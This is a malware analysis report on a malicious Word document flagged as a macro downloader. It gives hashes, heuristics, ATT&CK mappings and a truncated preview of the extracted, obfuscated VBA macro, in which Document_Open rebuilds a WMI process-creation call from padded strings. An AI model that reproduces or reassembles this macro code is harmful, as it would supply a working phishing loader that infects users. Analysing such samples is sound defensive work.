Office (OLE) malware analysis — malicious · 73bb57416aa009d5

MALICIOUS

Office (OLE)

192.0 KB Created: 2020-08-19 07:18:00 Authoring application: Microsoft Office Word First seen: 2020-09-07

MD5: 1a1ebba24be99815739e98634f49362f SHA-1: 76e908d39d2a66076be636161cd68b760a5c5fca SHA-256: 73bb57416aa009d5bc50da9027eec6bc8bec76050d7db2a4626cf60bb4f5331a

262 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. Critical heuristics indicate a hidden command stager within a UserForm, designed for auto-execution via the Document_Open macro. This pattern strongly suggests the VBA code is intended to download and execute a secondary payload, aligning with the ClamAV detection of 'Doc.Downloader.Generic-9390488-0'. The specific VBA code is heavily obfuscated with string concatenations and conditional logic, making precise reconstruction of the payload URL or execution command impossible from the provided excerpt.

Heuristics 7

ClamAV: Doc.Downloader.Generic-9390488-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Generic-9390488-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER

VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15381 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	15381 bytes
SHA-256: `e0b10553a0bd3b32dd10c3e6cc8c6e9ade31d242dd83cce76a2582cf6ec74cbc`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "G20j3op9yc86j" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub _ Document_open() Sxwwyn1boy3cncudo.Jg1ei_e2zdh1lq End Sub Attribute VB_Name = "Sxwwyn1boy3cncudo" Attribute VB_Base = "0{A6A480C1-6A53-4E77-927F-3412280DB4C0}{9A2BC25A-97B4-4DF3-AD61-D105C05304D5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Function Jg1ei_e2zdh1lq() Zl6b97lc6d72rlb = "937" If Len("F1o_cmfjj2k51sevwTnokm5ni6_t84vhll") = Len("Xluxgv4gvrmn") + 1 Then End If Len("Hf1uzo8ouw5rf1n01xE0zkhdh4sfj88sG3cat9o3m11") < Len("A6qh769gav6t") Then MsgBox "Mvpil190frv7zd" + "Uhmvs9g0c9nb0l" MsgBox ("R8uubn_tba3") MsgBox "Wo6mg3qp5jka" + "Ixnk9y0ye4zlfbe" End If If Len("Rlu12kuhwhkt8gpwtT2widm5t2vg") = Len("A1lwf01l3ac") Then MsgBox "S2oq29oc3elo" + "Lii7hu0bvgvi" MsgBox ("Ar8ii1yrum0n4 !!!") MsgBox "Fdj8o8p12spvrddev" + "Fq89gu7w1177ktp23" End If Luvixzstp22i4ewuk = Sxwwyn1boy3cncudo.HelpContextId + 50 + 50 Zwipehr7h7ssjh = "112" If Len("Lti5kdh04pbln2cD75ghdh4melu7z6") = Len("E6zwfiuo4xp_c7eeem") + 1 Then End If Len("Qqaomlpsg4xdeuDscro8mqnuyhLagqtliqfqmk11nw") < Len("Olp82wcy0ska") Then MsgBox "Vzdzcgwhv4m1_c2g" + "E05ham451pd3u59q" MsgBox ("Pxgbyh_0_tdh2um") MsgBox "Hlmgq5ml6n2spa" + "Kjsqd_xt25ia51x073" End If If Len("Hswkc3l7glqsuNz9jdjty4vmh5twio7") = Len("D2r4_py4eqhkmzbk") Then MsgBox "S13t3w1b960" + "G99v2oic795pqohvk" MsgBox ("N3iwtzeioe2 !!!") MsgBox "Buza7sk1wk4ie37mc" + "Kf28mhuypiqta" End If F2r_y26qnz1tsgw = ChrW(Luvixzstp22i4ewuk + (15)) J_o1dzci_lwilm0k = "494" If Len("L6igugb26ydWbqxv2klh8itn") = Len("Ndx7gf9s15ht54m_") + 1 Then End If Len("A00ekgw1wz_7Pz48y0d_s0molwpXr0iyiupsi8") < Len("Duq0wght18e") Then MsgBox "Wjsax1_uhyzhay" + "Kfnoqbc59sn3ep8mam" MsgBox ("Jo1t44jn5s7j00k") MsgBox "Jmszn4putj96fkly7" + "Iszwvwgyjmcjo5" End If If Len("Pt_txhu0fat6oitgiNx3f237szudsk7") = Len("Zu3meij3ttw") Then MsgBox "T4q1g677gcq" + "Fxfs_7y2y2py36dfj" MsgBox ("Gwf1e1i69yo_98d_er !!!") MsgBox "T3x77pbn49l" + "Sxl55xstpjf0_my4" End If Nq7quy7fq0zduif = "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfi111ss[sns ]]d][ jsa nbsb22v2yfnm111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfgm111ss[sns ]]d][ jsa nbsb22v2yft111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf" + F2r_y26qnz1tsgw + "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf:111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfin111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf3111ss[sns ]]d][ jsa nbsb22v2yf2111ss[sns ]]d][ jsa nbsb22v2yf_111ss[sns ]]d][ jsa nbsb22v2yf" + Sxwwyn1boy3cncudo.Dyt4hxr572u6li + "111ss[sns ]]d][ jsa nbsb22v2yfro111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfce111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yf" Kkpfyoat972u = "375" If Len("Mi2b3ajr8g_otwzmmWqcs92prkdyjhxxvw") = Len("Nllxczreq2e3lgw") + 1 Then End If Len("We4_kawl2f4Zm20ae5briona5kzM3rye4t4xksza") < Len("X75feag3hmvww2p0r1") Then MsgBox "Yjnla6tigo5mmrnrrg" + "Ezh2vfcsg4ny433c" MsgBox ("Ov5kv3_ooajfjj93") MsgBox "Oi2s4g9nnp41auup1" + "Xnnv8hmgf5m9tq7_ht" End If If Len("D2o79inhynqz2Iapr_mtfwadap7n") = Len("Bmacvgtrpmuaz5zfw") Then MsgBox "Fprtih40fo494r" + "Vmezy_fs9bx4sr4l0" MsgBox ("Bz9ote5kwbezsu !!!") MsgBox "E7rvq0oc8ts" + "Kksmc5t347q4_6n" End If Uog4tegi91ssz4ss0 = Zcasbv2yl2b_urkc(Nq7quy7fq0zduif) Jkpkotlqbfxf86 = "693" If Len("Rrwcb3bhz2u8ydpXegh2uj7pgh92ngpj") = Len("No_1oync1u6xxnw") + 1 Then E ... (truncated)

SHA-256: e0b10553a0bd3b32dd10c3e6cc8c6e9ade31d242dd83cce76a2582cf6ec74cbc

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "G20j3op9yc86j"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
Sxwwyn1boy3cncudo.Jg1ei_e2zdh1lq
End Sub


Attribute VB_Name = "Sxwwyn1boy3cncudo"
Attribute VB_Base = "0{A6A480C1-6A53-4E77-927F-3412280DB4C0}{9A2BC25A-97B4-4DF3-AD61-D105C05304D5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Jg1ei_e2zdh1lq()
   Zl6b97lc6d72rlb = "937"
If Len("F1o_cmfjj2k51sevwTnokm5ni6_t84vhll") = Len("Xluxgv4gvrmn") + 1 Then End
If Len("Hf1uzo8ouw5rf1n01xE0zkhdh4sfj88sG3cat9o3m11") < Len("A6qh769gav6t") Then
        MsgBox "Mvpil190frv7zd" + "Uhmvs9g0c9nb0l"
        MsgBox ("R8uubn_tba3")
        MsgBox "Wo6mg3qp5jka" + "Ixnk9y0ye4zlfbe"
End If
If Len("Rlu12kuhwhkt8gpwtT2widm5t2vg") = Len("A1lwf01l3ac") Then
       MsgBox "S2oq29oc3elo" + "Lii7hu0bvgvi"
       MsgBox ("Ar8ii1yrum0n4 !!!")
       MsgBox "Fdj8o8p12spvrddev" + "Fq89gu7w1177ktp23"
End If

Luvixzstp22i4ewuk = Sxwwyn1boy3cncudo.HelpContextId + 50 + 50
   Zwipehr7h7ssjh = "112"
If Len("Lti5kdh04pbln2cD75ghdh4melu7z6") = Len("E6zwfiuo4xp_c7eeem") + 1 Then End
If Len("Qqaomlpsg4xdeuDscro8mqnuyhLagqtliqfqmk11nw") < Len("Olp82wcy0ska") Then
        MsgBox "Vzdzcgwhv4m1_c2g" + "E05ham451pd3u59q"
        MsgBox ("Pxgbyh_0_tdh2um")
        MsgBox "Hlmgq5ml6n2spa" + "Kjsqd_xt25ia51x073"
End If
If Len("Hswkc3l7glqsuNz9jdjty4vmh5twio7") = Len("D2r4_py4eqhkmzbk") Then
       MsgBox "S13t3w1b960" + "G99v2oic795pqohvk"
       MsgBox ("N3iwtzeioe2 !!!")
       MsgBox "Buza7sk1wk4ie37mc" + "Kf28mhuypiqta"
End If

F2r_y26qnz1tsgw = ChrW(Luvixzstp22i4ewuk + (15))
   J_o1dzci_lwilm0k = "494"
If Len("L6igugb26ydWbqxv2klh8itn") = Len("Ndx7gf9s15ht54m_") + 1 Then End
If Len("A00ekgw1wz_7Pz48y0d_s0molwpXr0iyiupsi8") < Len("Duq0wght18e") Then
        MsgBox "Wjsax1_uhyzhay" + "Kfnoqbc59sn3ep8mam"
        MsgBox ("Jo1t44jn5s7j00k")
        MsgBox "Jmszn4putj96fkly7" + "Iszwvwgyjmcjo5"
End If
If Len("Pt_txhu0fat6oitgiNx3f237szudsk7") = Len("Zu3meij3ttw") Then
       MsgBox "T4q1g677gcq" + "Fxfs_7y2y2py36dfj"
       MsgBox ("Gwf1e1i69yo_98d_er !!!")
       MsgBox "T3x77pbn49l" + "Sxl55xstpjf0_my4"
End If

Nq7quy7fq0zduif = "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfi111ss[sns ]]d][ jsa nbsb22v2yfnm111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfgm111ss[sns ]]d][ jsa nbsb22v2yft111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf" + F2r_y26qnz1tsgw + "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf:111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfin111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf3111ss[sns ]]d][ jsa nbsb22v2yf2111ss[sns ]]d][ jsa nbsb22v2yf_111ss[sns ]]d][ jsa nbsb22v2yf" + Sxwwyn1boy3cncudo.Dyt4hxr572u6li + "111ss[sns ]]d][ jsa nbsb22v2yfro111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfce111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yf"
   Kkpfyoat972u = "375"
If Len("Mi2b3ajr8g_otwzmmWqcs92prkdyjhxxvw") = Len("Nllxczreq2e3lgw") + 1 Then End
If Len("We4_kawl2f4Zm20ae5briona5kzM3rye4t4xksza") < Len("X75feag3hmvww2p0r1") Then
        MsgBox "Yjnla6tigo5mmrnrrg" + "Ezh2vfcsg4ny433c"
        MsgBox ("Ov5kv3_ooajfjj93")
        MsgBox "Oi2s4g9nnp41auup1" + "Xnnv8hmgf5m9tq7_ht"
End If
If Len("D2o79inhynqz2Iapr_mtfwadap7n") = Len("Bmacvgtrpmuaz5zfw") Then
       MsgBox "Fprtih40fo494r" + "Vmezy_fs9bx4sr4l0"
       MsgBox ("Bz9ote5kwbezsu !!!")
       MsgBox "E7rvq0oc8ts" + "Kksmc5t347q4_6n"
End If

Uog4tegi91ssz4ss0 = Zcasbv2yl2b_urkc(Nq7quy7fq0zduif)
   Jkpkotlqbfxf86 = "693"
If Len("Rrwcb3bhz2u8ydpXegh2uj7pgh92ngpj") = Len("No_1oync1u6xxnw") + 1 Then E
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.